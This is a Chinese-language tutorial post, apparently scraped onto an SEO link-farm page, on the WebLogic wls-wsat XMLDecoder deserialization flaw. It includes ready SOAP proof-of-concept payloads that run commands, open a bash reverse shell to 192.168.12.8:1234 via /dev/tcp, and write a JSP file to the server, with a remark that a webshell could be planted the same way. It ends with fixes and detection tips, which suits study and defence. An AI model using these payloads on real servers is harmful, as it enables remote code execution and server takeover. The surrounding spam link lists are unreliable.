当前位置: 首页 > wzjs >正文

python可以做网站吗专业网站建设

python可以做网站吗,专业网站建设,网站挂载,wordpress密钥靠谱吗Weblogic < 10.3.6 wls-wsat XMLDecoder 反序列化漏洞 漏洞原理: 反序列化机制: weblogic sercer使用的是java的XMLDecoder类来解析和范系列化xml数据 xml Decoder是一个强大的工具,可以将xml数据转换为java对象,然而如果反序列化的数据不受信任,可能导致安全问题 漏洞触发点…
Weblogic < 10.3.6 'wls-wsat' XMLDecoder 反序列化漏洞
  • 漏洞原理:
反序列化机制: weblogic sercer使用的是java的XMLDecoder类来解析和范系列化xml数据
xml Decoder是一个强大的工具,可以将xml数据转换为java对象,然而如果反序列化的数据不受信任,可能导致安全问题
  • 漏洞触发点
weblogic server的wls-wsat组件提供了一个web服务点(/wls-wsat/CoordiatorPortType),用于处理SOAP请求
(SOAP是一种基于XML的协议),定义了如何在网络上传输信息 它是基于XML,因此消息是文本格式,易于阅读和调试 SOAP通常于http、HTTPS等协议结合使用,但是也能于SMTP等其他的协议一起使用
一个典型的SOAP请求包括以下部分:
  1. Envelope(信封) 根元素,标识这是一个SOAP信息,包含了Header和BOdy
  2. Header(头部) 可选部分,用于传递附加的信息(如认真信息,事物ID等)
  3. Body(主体) 必需部分,包含实际的数据请求
SOAP响应的结构:包含Envelope、Header和Body
该端点使用了XMLDecoder来处理传入的XML数据
  • 恶意XML构造
<java version="1.4.0" class="java.beans.XMLDecoder"><object class="java.lang.ProcessBuilder"><array class="java.lang.String" length="3"><void index="0"><string>/bin/bash</string></void><void index="1"><string>-c</string></void><void index="2"><string>touch /tmp/pwned</string></void></array><void method="start"/></object>
</java>#该XML文件会通过XMLDecoder反序列化为一个ProcessBuilder对象,并且执行系统命令例如:touch /tmp/pwned
  • 漏洞利用过程:
  1. 攻击者构造恶意的XML文件,嵌入到http的请求中
  2. 将恶意的XML文件作为SOAP请求发送到weblogic Server的wls-wsat端点
  3. Weblogic Server使用XMl Decoder反序列化恶意的XML文件
  4. 反序列化过程中,恶意代码被执行,导致远程代码执行
如下所示:
我们需要使用bp抓取数据包,然后构造恶意的XML文件即可!
我们需要将conten-type修改成text/xml
测试的poc为:

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i &gt;&amp; /dev/tcp/192.168.12.8/1234 0&gt;&amp;1</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>#这里使用dev/tcp;反弹shell 192.168.12.8/1234端口
#我们只需要用kali监听1234端口即可
还给到了写入文件的poc
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java><java version="1.4.0" class="java.beans.XMLDecoder"><object class="java.io.PrintWriter"> <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp</string><void method="println"><string><![CDATA[
<% out.print("test"); %>]]></string></void><void method="close"/></object></java></java></work:WorkContext></soapenv:Header><soapenv:Body/>
</soapenv:Envelope>  #写入了test的内容,我们也可以写入websehl
  • 漏洞影响:
  1. 远代码执行
攻击者哉目标的服务器上执行任意的命令,完全控制服务器
  1. 数据泄露
攻击者可以读取服务器上的敏感数据
  1. 服务器被接管
攻击者可以植入后门,创建新的用户或者删除数据
  • 修复建议:
  1. 打补丁 官方补丁
  2. 禁用wls-wsat组建,删除或者重命名wsl-wsat.war 和wls-wsat-coordination.war
  3. 限制访问,使用防火墙或者安全组限制对weblogic server端口的访问
  4. 检查weblogic server 的日子发现可以的soap请求
  • 漏洞检测
  1. 手动检测:
检查weblogic server版本是否存在响应范围内
  1. 工具检测:
使用漏洞扫描工具扫(nessus nmap等)
  1. Poc验证:
使用公开的poc脚本验证是否存在
http://www.dtcms.com/wzjs/369450.html

相关文章:

  • 大学php动态网站开发试卷中国互联网域名注册服务机构
  • 网站 设置特殊的字体网站建设营销型
  • 深圳做响应式网站新手怎么做电商
  • 有哪些做问卷调查赚钱的网站网站推广的技术有哪些
  • 一 网站开发体会快速排名seo软件
  • 发布网站制作seo云优化
  • 住建局官网查询系统网站排名优化客服
  • 黄冈智能网站建设平台站长之家关键词查询
  • 自己做视频网站可以吗快速排名点击工具
  • 盐城网站建设案例关键词排名优化品牌
  • 自己做的网站百度收索不到优化排名软件
  • 做网站配送地址怎么变换做网站价格
  • 可以做动效的网站营销网站建设选择原则
  • 周口在线网站建设游戏代理平台一天结一次
  • 网站做301对优化有影响网站权重优化
  • 网站毕业作品代做外链生成网站
  • wordpress 移动端模板下载惠州seo整站优化
  • 凡科网是做什么的郑州网站seo优化
  • 武汉市网站开发公司电话建站abc官方网站
  • 软件培训记录简述搜索引擎优化
  • 能用网站做微信小程序免费建网站的平台
  • 鄂州网站制作2023年10月爆发新冠
  • 沈阳网站建设国内设计公司前十名
  • 网站前面的logo标志seo快速入门教程
  • java做网站程序咸阳网站建设公司
  • 东营长安网站建设seo排名诊断
  • 同心县建设局网站附近电脑培训学校
  • 建设网站程序山西seo排名
  • 网站设置点赞网络舆情软件免费入口
  • 哪些网站可以做招商广告语厦门人才网唯一官网